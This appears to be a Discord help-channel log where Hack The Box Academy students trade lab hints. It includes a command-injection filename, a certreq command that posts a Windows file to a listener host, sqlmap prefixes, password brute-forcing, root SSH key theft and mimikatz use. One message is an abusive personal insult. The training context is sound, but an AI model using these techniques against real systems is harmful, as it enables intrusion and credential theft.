#modules
DM me
aight
To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./
Web attacks - Bypassing Security Filters
Could anyone help with this?
@stuck hull where are u stuck
Hello all. I seek help and I don't know how to proceed.
Talking about the "Skills Assessment - File Upload Attacks"
I don't know how to read the source code. I intercepted the POST request (uploaded an *.jpg) with Burp first. After that I tried to upload a svg because I tried to read the source code of a specific file in order to figure out where the downloads directory is. I don't know how to do that. Can you give me some hints?
hint ||request method||
sure shoot me a dm
finally finished the pentest path after like months of procrastinating also thanks a lot to @candid zephyr and @pastel ginkgo (sorry for the ping) for helping me out on my last module
Nice, time for CPTS? 😄
not before offshore (just because there is a discount)
Nice I plan to tackle offshore too. I'm going to sneak in some quick obfuscation courses from THM over Christmas
i did get a bit sad when i found out john hammond isn't doing this for THM on Christmas any more
How is the attacking enterprise networks module? I hear the assessment is tough
oh
neat
Does anyone have a good explanation for what a reverse proxy is? I've looked it up several times and I still can't put 2 and 2 together.
Hey all, i have some trouble with the nmap firewall IDS/IPS medium module. I tried with source port and many options
Did you try -D ?
think of it like a NAT with port forwarding, except you have an entire box dedicated to just doing that, with some potential WAF, load-balancing, etc. on the side.
I guess that makes sense
Yep, same issue. Impossible to get version
How many are you running ?
Try 5 and 10
try || 15, I had to use a high number for it to go through ||
Have you specified a specific source port?
I don't remember, it's been a couple months
I tried 15, 20. It doesn’t work.
Ok I have run exactly the same command and got the flag
🤔
i changed it, from get to post
Hi guys! Can someone help me on Print Operators section of the Windows Privilege Escalation module?
I don't quite seem to understand how to use UACMe to bypass UAC.
Edit: You don't actually need to worry about anything. Just input the credentials you're given to get a administrative shell and proceed as shown.
Hello. New here to the platform. I am about to start a new job that will use Varonis and Nessus. Does HTB have training or labs on this?
i have completed every module on the SQL essentials except the last 2 of attack tuning. I've done the final assessment and everything but can't figure out this one for #6, haven't tried #7 yet cause I'm waiting to figure out 6. but fr can anyone help, I've tried the prefix hint but that didn't do much. need a hint
I remember having something about Nessus on the Vulnerability Assessment Module
SQLMap or SQL Injection?
Thanks...do you have a direct link to it? I am logged in, but not sure how to get to it
Thx @graceful rampart
Half the module is about using nessus
It's definitely not like a full nessus course or anything, but it will teach you the basics
Thanks!
Anything on Varonis? Without having a license key, I am pretty much limited to Youtube
The software seems really cool..guess I will learn all On the job
For number #6 you have to use the prefix like
sqlmap -u "www.example.com/?q=test" --prefix='`)'
Try to think as how the SQL query is being written and how you can manipulate it to do what you want to do
hello i have a quick question yall
I am just excited to get started on the tech stuff again. I have been an ISSM (boring) for the past 1.5 years, and now I will be a Sr. Security Engr
Sounds like I will be managing the vuln programs
can my ip be pulled with a software like wireshark on discord vc? no, right?
AFAIK yes, it can. It isn't encrypted traffic so anyone in your network sniffing for network traffic can see your ip address, if someone is on the same network as you are they can also check your IP address through ARP table, or ping your mac address. There are a bunch of possibilities
testing now
thank you very much
yeah, just wanted to make sure. i join random servers and join vcs all the time so
was curious for my safety
Remember that being on the same network is different than being on the same server, i may be wrong but i don't think i can find your public ip address just by analyzing incoming discord traffic to my machine, because it isn't p2p.
The traffic comes from discord public ip address not yours
i know that but an ip grabber is an ip grabber
Is anyone having problems spawning the target VMs from the modules? The question provides the VM ip and Port but the VM/container isn't responding....
Nevermind. I respawned it 3 times, and waited a full 10 mins and pop the VM/container is responding. longest time I had to wait yet.
Your local IP will show on wireshark to people in your network.
People can't see random IPs in and out of Discord.
thanks
You see host > Discord > host traffic.
thanks man
Can I get a sanity check, on File Transfers living off the land, I am attempting to run this certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini and of course with my IP address. I have my NC listener on and when I run the command on the windows client I get a response back of (invalid argument: - POST)
Damn, anyone familiar with proxychains? Having trouble with it.
What's up?
Are you specifying the port of the NC? Try as
CertReq -Post -config example.org:port c:\windows\win.ini and show response in terminal
This would send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
If you don't specify the port, it just assumes it's port 80 and if your nc isn't on port 80 the connection doesn't work
Trying to get proxychains up and running properly. I am on the Web Proxies module, section Proxying tools. Followed the steps in which I go to edit the /etc/proxychains.conf file, comment out the socks4 127.0.0.1 9050 and add http 127.0.0.1 and https 127.0.0.1 . I save the file and try to run proxychains with the curl command as such:
proxychains curl example.com
However, I get this output:
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| example.com
|D-chain|-<>-127.0.0.1:9050-<--timeout
|D-chain|-<>-127.0.0.1:8080-<--timeout
!!!need more proxies!!!
|DNS-response|: example.com does not exist
curl: (6) Could not resolve host: example.com
Tried following the geeksforgeeks tutorial online as well lol. I'm missing some key point in how to set up proxies properly.
i was listening on port 80 and i just changed it to 8080 and still the same thing.
Weird, let me boot the machine and i'll try here just a sec
what's your proxychains.conf look like
thanks, reading the documentation on certreq i don't see anything on post
@candid zephyr This is the proxy list section:
[ProxyList]
add proxy here ...
meanwile
defaults set to "tor"
socks5 127.0.0.1 9050
http 127.0.0.1 8080
https 127.0.0.1 8080
I have dynamic chaining uncommented alongside proxy_dns uncommented as well.
try just the socks5 proxy
also does the module tell you to systemctl start tor.service?
or is that not the point of this module (I haven't done it)
It does not say to do that. Just starts off with saying to comment the socks4 127.0.0.1 9050 out, then add http and https 127.0.0.1 8080
And to enable quiet mode lol
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| example.com
|D-chain|-<>-127.0.0.1:9050-<--timeout
!!!need more proxies!!!
|DNS-response|: example.com does not exist
curl: (6) Could not resolve host: example.com
D: Geez
@vital adder Did suggest this last night, https://discordapp.com/channels/473760315293696010/774040263278592041/1055278915704344626
oh yeah i forgot the protocol in that
I did try to experiment with using netcat to listen on those ports. Just to see what would happen, it caught the traffic. But timed out still lol
not sure how it would work but of course you will need a proxy server to route the proxy traffic
i don't really understand what it'd be doing without tor running or something else
you're just routing traffic into nothing. are you supposed to have burp open?
mrtom probably more use i've not done the module x)
I realize that now, sorry a bit uneducated in the matter! And yes you're supposed to use burp with it. Was trying yesterday but hadn't managed to get it. Reading online on some things, gonna try it again.
oh so for this without tor running on your localhost and port 9050 you are just basically routing the traffic to yourself, but without something like a proxy server to process stuff it will just time out because your machine doesn't know what to do with the traffic
also i'm not really sure about this but burp is supposed to be a proxy (like proxychains) not a proxy server so not sure how you can use both
burp you'd use foxyproxy in your browser, not proxychains and curl.
The module just asks to use burp to see the traffic passing through proxychains I believe.
oh that kinda make sense
also with the magic of pivoting of course you can use both but it's just not that practical (if not in AD)
The module doesn't even mention tor. Not sure where I'm fucking up at or if the module is missing that. Following this tutorial now: https://www.geeksforgeeks.org/how-to-setup-proxychains-in-linux-without-any-errors/
@vital adder For the Attacking common applications, attacking tomcat. How did you get any directory traversal? I can't get metasploit to work or any other shell other than the first they mention and I can't get anything more than simple ls commands
like ls /root wont work but ls -la will q.q
the routing will finish after you die
nvm I got some directory traversal not to find the damn flag
for the metasploit method did you set the VHOST to ||web01.inlanefreight.local|| also if you use the cmd.jsp thing you should have full RCE
yeah it didnt work for me at all
oh wait nope the metasploit thing in my note was for brute forcing 🤣
but for some reason in my notes i make an elf payload and get a meterpreter shell from the RCE thing before i get the flag
just like the eternal blue one this only works like half of the time for me
lol I found the flag for the next section but I cant find it for this damn tomcat one
it drops me into the root directory and theres like 10 flags on this damn machine with different names xD
found the flag, it just wont read it x)
oh wait i just double checked, they did give you the flag name, you can just use a find command with that name
question for some ppl in here: Are you all knocking out the modules and then doing some machines or are dabbling in both? Trying to grasp what is the optimal approach here. thank you!
I tried attacking the machines, failed miserably went back to acad to learn more
Mine is chaotic, dont do my method lol. I am just jumping around and doing the modules I can understand and knock out. Then I go to machine to view walkthroughs to understand how they do it. @elfin timber
yes #modules message
Im following the pathway, they build off each other but sometimes will reference modules that are far towards the end
like I hear the AD Priv Esc module is handy for the AD module
I'm using this to supplement my learning for OSCP. I felt that there were gaps of learning from the PWK that I'm trying to fill with the modules. For example, at the end of the "Getting Started" module there was a list of retired machines at the bottom of the page. Are you supposed to do those before moving on to other modules or is it discretionary?
I've only done a couple of modules as a refresher before I buy Offshore pro labs. I prefer the CTFs for learning but there's some subjects that are handy to just bosh through.
There's a list of "OSCP-esque" boxes for HTB.
yeah I have the TJ list
Some of the old ones are trash and not worth it though.
@vital adder Okay, so I believe I understand the issue now. In the conf file for proxychains, the default proxy is: socks4 127.0.0.1 9050 which is the default (uses tor's network). The module doesn't mention using tor and seems like y'all are against it due to slowness. So you must've used another proxy server of your own (free ones online or create your own?) in order to get proxychains to work properly. I am starting to understand that yes, I don't have any actual servers to route the traffic through lol. But, I mean there must be a way to create a simple one on your own machine no? Curious how you did it.
if you read the oscp course syllabus and compare it to htb academy module they are 90% the same but htb stuff is just newer and better
yeah I've gone through the PWK. Some ppl say everything you need to learn is in there and some say it's a mile wide and an inch deep. I'm more of the latter which is why I picked up Academy
https://free-proxy-list.net/ Thinking I need to use this.
if you want to try out proxychains tor will run just godly slow so if you just trying to ping or do a simple open port scan it won't take that long
@iron basin forgot network chuck has a video on this https://www.youtube.com/watch?v=qsA8zREbt6g
Ah yes, beard coffee hacker man
no that's a hacking pug
haha lmao
;D
ha take that
someone tell me how to set up the wifi on linux. i connect to the wifi but i can't access the internet. i installed linux as a main os
main os, how to set up the internet
What linux OS did you use?
And you don't have access to the internet? But are able to connect to wifi?
yes!
ugh, I think I had this issue once. Lemme try to remember haha
i installed all linux distros like kali, parrot, mint, ubuntu but wifi shows and connects but i can't access the internet
i ping google.com but the ping doesn't give an answer, it only sends packets
real ip or local ip
private
yes
yeah can you ping 8.8.8.8
i tried all these solutions but can't solve this problem
if you can, you're online; if you can't ping google.com it's a dns issue
yeh i think
Can you see other computers on your network?
no my wifi work properly
Can you do traceroute google.com?
i not try
Can you run it and show the output of that?
okay bro
Well, maybe dm me the output, not sure if ya want to reveal any potentially sensitive IP info
that or hide ya real IP address before ya send it lol
meh, I'm still stuck with the Skills Assessment - File Upload Attacks module. I can't figure out how to read the source code :/
bro i know i just kidding
Hi! I have a problem with a question in a module
I have to do JSON POST and there i have to use a cookie, but it says that I need a valid authentication cookie
anyone do the password mutation module recently
If someone is able to help me, I am stuck on Case# 5 on the SQLMAP Essentials module. I've got the flag, but it's not working.
a base application with nothing just the icon as an app
Hey! I'm trying to SSH into the machine on Password Attacks / Pass the Ticket (PtT) from Linux. I can't. Can someone tell me what I'm doing wrong? Is anyone else facing the same issue? (I tried both my own VM and Pwnbox)
Hi, I'm new, I'd like to learn hacking and I'm really looking forward to being the best of myself. I'm from Peru.
Read carefully the username that is given
what method are you trying
Hi I recommend the basic fundamentals courses to get a taste, unless you want to dive hard into a specific path :)
In the PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment, i dumped the lsass.dmp file on the windows box, but i don't know how to bring mimikatz onto this machine to exploit the lsass file. I can transfer it to the Linux box but I'm unable to upload it to its webserver since i'm connected with sskey and not password (so unable to sudo). Any idea?
Was able to read the upload php file but I'm confused about bypassing the filters
by sskey do you mean rsa key?
if so you can absolutely transfer files with scp using a rsa key
yes i can transfer it to the linux box, but then i'm connected to the windows box through the linux one by proxychains
yes rsa private key
you can proxychains scp too
oh ok thank you i'll try that
okay try uploading a valid picture file with different filenames to see what filters are blocking you, then try uploading manipulated image files with valid filenames to see what will get past
Also: I can't remember if it was getting blocked, but I didn't use GIF8
Hey everyone. I'm currently on Active Directory Enumeration & Attacks - AD Enumeration & Attacks Skills Assessment Part 1 question 4. I went back to connect to a previous module which landed me on HOST MS01. I got domain admin on MS01 and the flag.txt is not located on the Administrator's desktop. Am I coming at this the right way? I would appreciate any help. I have been stuck for quite some time.
I fuzzed the files and phar should do it. I tried to add double extensions but that didn't work. For example shell.jpg.thar and shell.thar.jpg
Do I have to fuzz the content type for this challenge?
you won't need to alter that from the original
did you mean phar in your filenames?
- minor nitpick but you don't have domain admin yet, that's a very special role.
- File should be there, dunno why it isn't for you, I'd restart the box and log back in with the creds you found.
Ah okay so that saves time, nice. Uhm yeah I did run ffuf after uploading a normal jpg image. I got a few hits and one of them was thar. I think it's the right one but there were some others as well which I can't check right now.
okay you may have mistyped your wordlist or something, thar isn't a recognized executable, so that won't work. you can dm me if you need more help
I am making the module web requests
but I dont know why when I try to curl a file
I don't get a response
it just keeps thinking
I re-downloaded and connected the vpn, reset the target a couple of times and checked my internet connection
but I can't curl the file
1 sec
Module: Web requests
Section: 219
when I try to curl a file I don't get a response, it just keeps thinking, I re-downloaded and connected the vpn, reset the target a couple of times and checked my internet connection
but I can't curl the file
(last one)
curl http://68.183.47.198:31307/download.php
curl: (28) Failed to connect to 68.183.47.198 port 31307: Expiró el tiempo de conexión
I also tried
curl 68.183.47.198:31307/download.php
like the example above shows
Akex06@htb[/htb]$ curl -O inlanefreight.com/index.html
"To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above. "
am I doing something wrong?
hmm
let me try
do people like the pwnbox?
I aint hating on it, I just said I don't like it
do I need to connect to the vpn on the pwnbox?
still the same issue
wget works?
It might
I just end up doing a > (unknown). type
im sure curl --help is more useful ¯\_(ツ)_/¯
still the issue idk why
I searched up for "Web Requests htb" on youtube and the guy got the file with the same command I did
Are you able to connect to the actual url still?
Because that may be the main issue
I reset the target 2 times already and now you tell me to reset it and it works
ty still <3
Sometimes the modules are touchy
I had one where I put the command in correctly on my VM but it didn't output correctly/copy paste to pwnbox worked lol
Btw if you are in a situation where pwnbox works but yours doesn't try redownloading your vpn file and reconnecting
kk ill try it next time
is there a way of refunding a module?
I bought the introduction to network module for 10 cubes and I realised that I already learned that in school
like 2 weeks ago
I’m still getting used to the AD hacking terminology/lingo and was incorrect with “domain admin” (was just assuming as I could read access Administrators directories). Thank you for pointing that out and making me aware. I have restarted the machine and still there is no flag.txt in Administrators. To further clarify I connected to #module:Active Directory Enumeration & Attacks #section:Credentialed Enumeration-from Windows for this as I was unable to evil-winrm into the machine on the #section:Skills Assessment Part I with the credentials from question 2 and 3.
Ah that wont work
While similar, the assessment environment is different than the section environment
you HAVE to do it from the assessment instance
i mean that means you should breeze through it. I have a CompTIA Net+ cert and I still am prob gonna take the htb networking, or you can potentially submit any errors you find in #858470491676737536 with corrections ¯\_(ツ)_/¯
@keen obsidian
the issue is not that I have bought the module, the issue is it's a read-only module, I won't get my cubes back :c
all of the 10 cube modules should refund you on completion
Thank you for letting me know! 🙂 I am still a little lost of how to proceed for question 4. Again I have attempted to connect via evil-winrm with the credentials from question 2 and 3 but it won’t connect. I know evil-winrm port is opened as I performed an nmap scan on the box and found it to be opened. Am I right in proceeding this way? I would very much appreciate a hint/nudge as I am lost at this point.
@magic valve whats the url i'll help
Url as in the link to the module/section I am working on? Sorry if this is incorrect
it's at the top of your web browser starting with www or https. i got notes to help i think, i just don't wanna search through hundreds of messages
@magic valve
what with it?
Basically telling you the same thing as others, completing the course gives you the cubes back
ahh i see it one sec
That’s what I thought u meant..just wanted to make sure. Lol. It’s https://academy.Hackthebox.com/module/143/section/1278
my notes are nonexistent for the part 1 assessment, but I would say there is more than one way to connect to it, don't be married to win-rm if that isn't working. After all win-rm only works if powershell remoting is enabled for that user.
oof unfortunately i have not done that module, i've done the ad basics though. im 62% done with cpts so if you need help with other stuff in future i can help
just send a dm i typically am on around 630-1130 est
No worries! I very much appreciate it!
no prob 🙂
and always take great notes, a lot of people don't but it's super important bc that way when you complete all the labs you can quickly go through the questions and have solutions handy. plus note taking and documentation is an important skill for pentesting ❤️
I always do. Thank you for the tip! 😃
fo sheezy neezy
To add onto taking notes: note down why specific tags/options are used, not just that you're using them
That makes sense! Thank you! I will attempt to put sharphound on the web shell to enumerate a little further of how I can connect to MS01
Why are you specifying -p on nc -lvnp port
yep taking good notes on ANYTHING you don't 100% know to do off the top of your head is super important. and can save you having to struggle again with entire course when reviewing for exam
Hello, can someone help me with this pivoting assessment question?
Very good point. This is something I haven’t been doing and will start to.
you'll def do port 3389
@kind vessel
so pivot/tunnel an nmap command and find the next device and then somehow gain access to rdp(i think)
Avoid spoiling answers here! Provide guidance on where they should be looking and what they've already tried first
for sure my b
here there is a lab thats quite similar i think one sec i'll find @kind vessel
If they're using the right commands they'll reach the right port :)
check the lab and your notes for section web server pivoting with rdp
I find the ip i try to rdp from the first Windows host to the second but didn't work
Reread the sections
might need to do it via pwnbox, some of the labs on here only work with pwnbox unfortunately, tho im not sure about the one you're working on
Do you know which labs aren't accessible by our own VMs or will I figure it out when I get there
also rdp and socks tunneling section @kind vessel
i know on pivoting the second and third lab wouldn't work except on pwnbox @fathom pendant
module* not lab
section not module lol
really only pivoting module is the one i had trouble with almost all the others work on vm
i was trying that but my bad i don't run cmd as shell lol
crackmapexec winrm 10.129.193.3 -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt
So i'm running this right now. Anyone know how long this is going to take? It's still on username root. Been about 10 mins.
probably ages, cme is slow for bruting
Can I dm anyone about the attacking common applications - Os Module?
i think I got 2 and 2 together but im getting 3 and not 4 so I must be missing something
guys, do you know if there is some tool that lets you have a pool of copied values? Just like having more than one CTRL-C saved
maybe this is the wrong channel for this question
Any suggestions on what I should do? I'm on password attacks module. First question on Network Services
Don't remember that one too well, but I'd probably check if hydra can do winrm.
or see if smb is available and hydra with that, as creds will be the same as for winrm most of the time
@thorn urchin Have you done the Attacking Common Applications Module yet?
Good evening, I have developed a project to recreate the netflix website with 2 weeks of front-end course, if you want to take a look and if you can give a star on the project it will help a lot
I've slowed down a lot cause of RL obligations, I think im a couple sections behind you.
but im in the middle of that module, probably finish it by tomorrow night I expect
The OS support page one is killing me I understand how the exploit works it's just not working lol
¯\_(ツ)_/¯
ill see when I get there lol
last one I did was jenkins, so whatever's after that is what Ill be doing tonight
Yeah Jenkins was cake and same for the one after that.
yeah the module has been actually disappointingly easy so far. I had heard a lot of people saying it was super tough as the capstone to the web section of the course
but maybe thats just the last third lol
Hello everyone, I just completed the XSS module, but the Finish button (at the ending section) is not displayed, could someone please check and confirm that?
shouldn't take more than 5 min usually 1 or 2
it means you missed a section and forgot to hit mark as completed at the bottom. Go through your section list and see any that doesn't have the green checkmark
Been about 30 mins
nop, I did it for all sections and I submit the skills assessment flag but cant get it
I guarantee you're missing one
not a question, but an actual mark and continue
Screen shot the list of sections to the side
you have to do it for sections with no questions too btw
check ur dm please
Man I wish HTB had more hoodies with different colors.
Lets get some shit that pops
@languid fjord I'm sorry I should have asked before i dm'd you. I didn't read it until after i already sent the messages. My apologies.
pretty common. i think if you add those 4k hdmi plug ins. it lets you bypass the problem and can adjust it again. they are cheap too
@thorn urchin I found the a way in for the OS module... was stupid simple.
good to hear, dont spoil it for me yet lol
I swear I will spend 2 hours on the easy stuff and 15 mins on the hard
hey thats kinda the whole point behind triaging to improve that lol
Do you think the following would be good for advancing pivoting knowledge for OSCP? https://academy.hackthebox.com/module/details/158 - Or would you guys recommend going for a prolab to learn that?
aint that the truth!
that module will teach you ALL you need to know
imo
its an awesome fun and singhtful module
insightful;*
I wish it went a little deeper into double pivots though but maybe im a masochist
yes
mind if i dm you?
hey, someone could help me with the Skill Assessment - Broken Authentication module?
hacking crypto is doing the world a favour.
All the WOKE engineers agree
now i demand u to teach me
I dont care about the ethics of hacking crypto but this channel is about HTB academy, if youre not here to discuss that, get lost.
I hope you slip and get your dick caught in a meat grinder.
Hey have a question if I am in the Pentester job role path should I use the cpts help instead of modules help
for help with specific modules use the modules channel. For questions and discussions about the CPTS curriculum and exam , use the cpts channel 🙂
sorry forgot where I was lol
jerseys are sold out too in the size I want
ok was wondering if this is the same channel for questions in the modules of the Pentester job role path
I liked the jerseys.
yes this is the place
ok cool thank you
j
guys i'm in privilege escalation in getting started but i can't reach the root's flag. Can someone help me? I'm stuck :/
I got the user2 flag and I can see the path cat /root/.ssh/ with the
authorized_keys ,id_rsa and the id_rsa.pub
but I really don't know how to access to root privilege
I'm feeling dumb xD
Well. What can user2 do? How do we see what user 2 can do. To avoid spoilers in here DM; for hints keep asking
User 2 can do bash! But in my mind i think that we can just cat the id_rsa.pub and then logout and do root@IP -i [A VERY LONG ID_RSA.PUB]... but when i try to do this i have no response from the server. Instead if i try to echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys i don't have the permission
thanks for helping btw
i tried to chmod but permission denied
SO I learned that the private key is on our local machine and we use it to log in without a password BUT (and that's a thing that idk if it's true) if we can add the rsa.pub to the authorized_keys we can skip the password and get the privilege... but i can't figure out how to do it :/
Well, if you can read someone's private key, you don't need to add your own public key to authorized_keys, you can just steal their key and log in with that
is that too spoilery? idk
I DID THAT BUT look
can't upload screenshot
If you can read a private key then im 100% sure that what you need to do was explained in the module
feel free to dm me
DM me or tux because you are super close to the answer
^
We can't say much more without it ending up in spoiler territory
need to verify your account to upload screenshots
Ok so I'm trying to explain the problem. I have the key ok? but if i logout and copy and do root@ip -pPORT -i VERY LONG KEY i get no response from the server. this is my problem
ah ok. How can i verify?
I think what i said is about as close to spoiler territory as you can get without just flat out giving away the answer
Well yeah, you're not going to get much with just the raw key
why are you putting the full key in the command? save the key to a file and then use -i <file>
But as said, the module tells you explicitly what to do
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
I'm trying to connect to smb
how can i find out the network name?
Yeah.. that's the embarrassing part. when i open vim i really don't know what to do. i copy paste the key.. press :q but vim tells me "No write since last change (add ! to override)" and then i try to exit and the only way is :q!
i have vim.
use sublime text
Cuz you don't have write privileges for the directory you're in. Read the error wrong 😅
:wq
Can i DM you?
Been working on this question for 4 hours lol
not right now. Sorry
you're welcome
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. can someone help me with this
I don't know how to start
thanks.
Load key "id_rsa": invalid format when i try to ssh root@etc. xD
How can i figure out the name of this share name.
I have the creds, but cant connect.
──(ruderaph㉿kali)-[~]
└─$ smbclient -N -L //10.129.202.136
session setup failed: NT_STATUS_ACCESS_DENIED
smbclient -L //<IP>/
DM me the exact error
Thank you
an early Christmas gift from the Academy team!
I DM you 🙂
Does anyone have silver annual membership?
@blissful verge 500 cubes for crackmapexec. I honestly never heard of it until I started the password attacks module. You think it's worth while to learn it in depth?
Dude... He's going to tell you yes lol
IDK, I've been on silver for the last year. I have the entire pentest path unlocked, and 400 extra..
Well it's one of the cornerstone king applications of Windows AD pentesting, right there with Responder and BloodHound, so yeah
@hazy grotto I was thinking about silver, but I'm 50 percent done on pentest path, and I'm not really interested in bug bounties.
The one on one help is interesting though.
I'm thinking of getting the annual to get the tutoring.
Just want to know how the response time is.
yeah, same.
Wait, I have silver and there is tutoring? How do I get this
I have silver membership
it's a tool I use on every pentest, so yes it is worth learning it well. I have been using the tool since it first came out and I learned a bunch of new tricks doing QA on it. Also, it's written by one of the tool authors, mpgn, so there's a ton of info in it
hi, did you finish skill assessment 2 no sqli?
I’m hoping for more macOS content🤞🏻🤞🏻
for the skill assessment I'm trying to upload mimikatz to the Windows machine, however I can't figure out how. smb, http server, nothing works. I have a meterpreter session.
I think I need to port forward but what I'm trying isn't working
Hello there hope you guys are well!
Anyone seen this error before with hydra? Trying to brute force ssh in the network services section of the password attacks module
maybe reset machine not sure tho
Out of memory it forgor
Tried that already
It has to be annual silver.. 490 bucks
What even is this exercise. Why have it if half of it doesn't work 😭
I just completed that section
Am i doing something wrong?
did anyone do machine three in the learn the basics section?
-vv just makes it show me every attempt and -I is to skip the 10 second wait when it tries to restore the last session
but the module give back 0 cubes?
im going to dm you
They shouldn't affect how it runs
I was looking at the wrong one. I ran a few different ones
please do
Alright, if anyone needs help with this one, I found a workaround. The machine is still broken but I found a way to get all the logins
(It's most definitely not intended tho, and if it is then whoever designed this module needs a kick in the head)
I'm very lost on the live engagement section of the payloads & shells module. I know what to do but I think I'm not understanding a network detail here because I cannot access any of the targets.
You have to rdp into the foothold machine they provide and do everything from there
run firefox from the commandline
I had the same issue
Bruh. Okay did not know that was a thing, thank you.
idk why tf there's no shortcut for it
I spent like 30 minutes trying to figure out what i was supposed to do
I'm also unable to ssh using root. It constantly times out too
@vital adder For the Attacking Common Apps Skills Assessment 1, I can see the flag but I can't read it. I also cant get a reverse shell with metasploit, powershell or any other way. Any ideas? im so close lol
powershell isn't installed 🤣 and if you want to get a rev shell there should be a python script on github for this vuln, but if you just want to get the flag you should be able to just copy it to your current directory and you can use metasploit ||ghost cat|| to read the flag
oo ghost cat is a good idea
i just got it in there and tried directly going to it and got an error lol
HAZAH i got it
fuck me
I'll go get the lube
I'm stuck on the second question for Privilege Escalation. So basically my understanding is the private SSH key for this root account is viewable by anyone because it was improperly secured with chmod 644 instead of chmod 600. This misconfiguration allows you as the attacker to copy the root's ssh key to a file on user2's account, name it id_rsa, set the permissions to chmod 600, then ssh into the root account using 'ssh root@<ip> -p<port> -i id_rsa'. However, when I do this, the ssh command just hangs and times out. I've tried resetting the vm and the HTB attack box; I've tried using my own vm; I checked the discord server and found several people had the same issue but it's still not working for me. The only other thing I can think of is to change the ownership of the id_rsa file from user2 to root but I was unsuccessful with this because it asked me for user2's password.
send me a dm with a screenshot of the error.
Thanks again for helping me fix this issue. It's working now and I will never forget this lesson! So I made two mistakes: 1) I tried to ssh into the root account from an existing user1 ssh session; and 2) I had some space to the right of the last character (-) of the private SSH key, which resulted in the ssh root command prompting me for the password in spite of the fact that I supplied it with the id_rsa file. 👍🏻
👍 😎 🎉
lessons learned :D
also nfs is super simple compared to smb LOL i guess because we stay in linux
Good morning. Could anyone help me bypassing the upload filter in the skill assessment center in the upload module?
anyone finished "User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them" from "Introduction to Windows Command Line"
DM me.
DM me.
Password Mutations: i get always the message: Please specify the hash-mode with -m [hash-mode].
.\hashcat .\Password-Attacks\password.list -r .\Password-Attacks\custom.rule
@everyone any of you know about cybersecurity Saas apps if yes can you pls tell me what these companies and apps are not providing
Have you managed to get the flag for this one?
yes
Did you find it harder than when we had to look for the Waldo.txt file earlier on?
try hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
Where did you find the command for this?
i missed --stdout, thx
@ripe badge bot commands do not belong here. There's a reason why we have #bot-commands
can someone tell me the best free port forwarding for msf
@meager topaz what
imagine thinking this chat is going to be useful for something like that :^)
yes
This might be a stupid question but let's assume I'm able to upload a php file with burp. The extension to bypass the filter is .php\x00.jpg. how on earth do I access this file in the browser?
Hello guys, can someone help me on Enumeration with NMAP Module ?
@meager topaz do u think that is possible 🤔
Password mutation
User : Kira
MySql
Howw
Hello everyone....
I am a newbie here. Just looking around here and trying to learn something but I don't understand what you all are chatting about. 😁
what does it mean?
Hello, I'm on the pivot assessment. I found the second user ||I found known_hosts in the first Windows machine|| but I don't know how to exploit it. Can someone help me?
so you are on the first machine? and if you found the user cred for the second machine you can just pivot and rdp in
Does someone have the NMAP Module ?
sure what's the issue?
Can i dm you
sure
https://www.youtube.com/watch?v=53zkBvL4ZB4
also hint ||mutate the|| given cred
I try to answer every question I get. Unfortunately a lot of them are extremely low effort and waste my time. I love to help, but please put some work into your question.
As someone that works in IT I am 100% sharing this with my colleagues in our work chat tomorrow LOL
here also share this https://dontasktoask.com/
I Work helpdesk at a callcenter but it bothers me so much when people are asking the "why does this break" and it's like "I don't know, i wasn't running windbg when your system crashed"
yea it does get annoying when people are asking stupid question like that or "how to hack"
how to hack; step 1; get compyuta step 2; google
Hi! I think i have found a mistake in a module!
which section and wtf what happened to your font?
so for that do some research on the WordPress xmlrpc attacks like the question said and if you found some exploit code you can send it with curl like in the example
also a tip for this section is when you get the right output throw it in something like sublime text and look for the string <string>, and the number of matches should be the answer
I wrote the problem there, thanks!
can someone help me with this
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
@keen obsidian ask better questions but also reread the module, it tells you how to get the info you're looking for
good one
But in reality what is the actual thing you are having issues with? Otherwise you're not really gonna get assistance, just sassistance
Password Attacks / Pass the Ticket (PtT) from Linux, Q5. The python KeyTabExtract script only gave me the AES-256 hash and not the NTLM. How will I crack this hash? And/Or how can I use Rubeus (on the Linux machine that I have access)?
(screenshot of the results:)
there's something weird about that module, idk man.
sometimes the tickets update, sometimes they don't. I just got lucky
i eventually stopped doing academy. saving up money for OSCP instead
hopefully you've been taking notes as well, because "Kira" comes back later
if you didn't save her password, you're in trouble
that was the last straw. it's my own fault for not keeping notes, but still...
When you faced these issues did you contact support or anyone in Discord to find a solution for it?
Has anyone finished the LFI module and the skill assessment? I'm not sure if my connection is bugged but I can't receive the source code of the php files
Where can I find that hashtag?
if you click the hashtag/link it will bring you to the Discord channel for the Rasta lab
It does not open
you need to do the verify in #bot-commands
guys
I found a SIGNING_KEYID, SIGNING_PWD, OSS_USER , OSS_PW and GITHUBKEY in a github repo, how can i exploit now? in a travis.yml file
responsibly report the vulnerability to the project creators; this is not a black hat server (nor is this even the correct channel on the server...)
i mean is it sensitive?
do you think credentials and keys are not sensitive?
yes it is but, they ask for impact. I need impact
if you're looking for someone to write your bug bounty report for you, this is not the place
can anyone help on the last question of the assessment in "Active Directory LDAP"
I'm confused of what its looking for
the place is chatGPT! 😆
shoot me a dm if you still need help
What is the default htb user and PW for neo4j? I'm trying to do the ad bloodhound module.
neo4j:neo4j didn't work and neither does neo4j:bloodhound
i didn't do that module so i can't help with that but if you are on the pwnbox and can't login stop neo4j and run
Ty I'll try that
Unbelievable, this actually works
googling that name gives me nyan cat so probably yes
one of the images google show of lulzsec is nyan cat
one of the members is nyan cat?
I got a steganography PNG image encrypted with a passphrase
I tried steghide but it doesn't support PNG format.. I tried converting the image to JPG and then used stegcracker.. I still couldn't find the passphrase
if you need to brute force the password try stegseek it can go through rockyou in a few sec
